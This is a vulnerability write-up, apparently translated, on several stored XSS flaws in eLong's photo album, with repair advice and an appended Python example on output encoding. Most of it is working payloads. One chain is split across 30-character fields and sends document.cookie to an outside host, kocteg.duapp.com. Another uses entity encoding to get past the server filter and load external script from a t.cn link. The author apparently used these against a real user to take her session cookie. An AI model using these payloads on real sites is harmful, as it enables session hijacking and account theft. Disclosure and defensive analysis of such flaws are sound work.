Yilong (eLong): multiple stored XSS, breaking the length limit (principle, exploitation and repair)

Source: Internet
Author: User

Details:
1. ">
1) Location:
A) Album
B) Forwarding
C) Editing the name

2) Exploitation
This is very easy to exploit. At the first two locations the XSS fires directly. For the next one we captured the request:

The items above are displayed plainly on the page, so a CSRF request can modify the subject directly.
2. "onload="alert(1)"

1) Location
A) Directly on the album page the XSS fires.

B) On the image editing page the XSS fires.

2) Exploitation
Method 1: direct XSS; Method 2: CSRF + XSS.
Of course, there is also the more convenient way: "break the length limit and XSS the Yilong girl" (section 4 below).

3. '; alert(document.cookie);//

1) Location
A) Outside: viewing the photos in the album

B) Inside: clicking to view a photo

2) Exploitation
The most direct of all: just viewing the photo fires the XSS.
4. Breaking the length limit to XSS the Yilong girl!
After all of the above there is still one problem: each field accepts at most 30 characters. To XSS the Yilong girl, the length limit has to be broken, and several of the XSS points can be combined to do that.
Our cross-site payload is

http://kocteg.duapp.com/a.php?v=elong&c= with the value of document.cookie appended
Because of the length limit this payload cannot be used as-is, so split it up:
1: "onload="g=document.cookie"
2: "onload="h='http://kocteg'"
3: "onload="h=h+'.duapp.com/a.'"
4: "onload="h=h+'php?v=elong&c'"
5: "onload="h=h+'='+g"
6: '; window.open(h);//
Put one fragment into each image.

As soon as the girl opens this album, she is XSS'd....

Er... what is it that duapp sets? The IP address cannot be obtained...


5. Principle and repair

1) First: ">

" and > are not filtered.

2) Second: "onload="alert(1)"

" is not filtered.

3) Third: '; alert(document.cookie);//

Where the value is placed into the JavaScript call, the single quote is not filtered either.

Previously, because elong filtered the angle brackets <> and the script keyword, JavaScript code could not be loaded and the cookie was sent out via GET; this morning I got up and tested how to bypass that and load JS, in order to GET the very long cookie that previously exceeded the URL length limit.

<script/src=http://t.cn/zWEGaNi></script>
The code above loads external JavaScript. Split it up:

"onload="h='&lt;scr'"
"onload="h+='ipt/src=h'"
"onload="h+='ttp://t.cn/zWEG'"
"onload="h+='aNi&gt;&lt;/scr'"
"onload="h+='ipt&gt;'"
"onload="document.write(h)"
The server filters <> and "script", but the client does not: &lt; passes the server-side filter, the browser decodes it back to < when it parses the attribute value, and document.write prints the tag. Below is the very long cookie that was obtained.
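An added example (not the write-up's own code, and not elong's): the Python below contrasts the blacklist filter described here, which drops <, > and "script", with context-aware output encoding, the repair that closes all three injection shapes and the entity trick at once; the sample strings are constructed, and the rendering helpers (weak_attr, fixed_attr, weak_js, fixed_js) are hypothetical stand-ins for the site's templates.

```python
import html
import json
import re

# Constructed samples in the shape of the write-up's injections (not the site's real data).
BREAK_ATTR = '"onload="alert(1)"'            # closes the attribute and adds an event handler
BREAK_JS = "'; alert(document.cookie);//"    # closes a JS string literal
ENTITY_FRAGMENT = "h='&lt;scr'"              # entity the browser decodes inside an attribute

def blacklist_filter(value: str) -> str:
    """The server-side filter the write-up describes: drop < > and the word 'script'."""
    stripped = value.replace("<", "").replace(">", "")
    return re.sub(r"script", "", stripped, flags=re.IGNORECASE)

def weak_attr(value: str) -> str:
    """Vulnerable pattern: blacklisted value placed straight into a quoted attribute."""
    return f'<img title="{blacklist_filter(value)}">'

def weak_js(value: str) -> str:
    """Vulnerable pattern: blacklisted value placed straight into a JS string literal."""
    return f"<script>var n = '{blacklist_filter(value)}';</script>"

def fixed_attr(value: str) -> str:
    """Repair for the attribute context: entity-encode &, <, > and both quote characters."""
    return f'<img title="{html.escape(value, quote=True)}">'

def fixed_js(value: str) -> str:
    """Repair for the JS string context: JSON-encode, and hide < > so </script> cannot close the tag."""
    encoded = json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")
    return f"<script>var n = {encoded};</script>"

def title_value(markup: str) -> str:
    """Raw text between title=" and the tag's final "> (greedy, so an injected quote stays inside)."""
    return re.search(r'title="(.*)">$', markup).group(1)

def attr_breaks_out(markup: str) -> bool:
    """A raw quote inside the title value lets a second attribute such as onload= be introduced."""
    return '"' in title_value(markup)

def attr_value_seen_by_js(markup: str) -> str:
    """Browsers decode entities in attribute values: this is what an event handler's source contains."""
    return html.unescape(title_value(markup))

def js_breaks_out(markup: str) -> bool:
    """The literal ends early if its delimiter appears unescaped, or if </ could close the script tag."""
    body = markup[len("<script>var n = "):-len(";</script>")]
    delim, literal = body[0], body[1:-1]
    return re.search(r"(?<!\\)" + re.escape(delim), literal) is not None or "</" in literal
```

The blacklist leaves all three samples untouched because none contains a raw angle bracket or the word "script", while encoding for the actual output context neutralises each of them and turns &lt; into &amp;lt;, which the browser decodes to the harmless text &lt; rather than to <.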
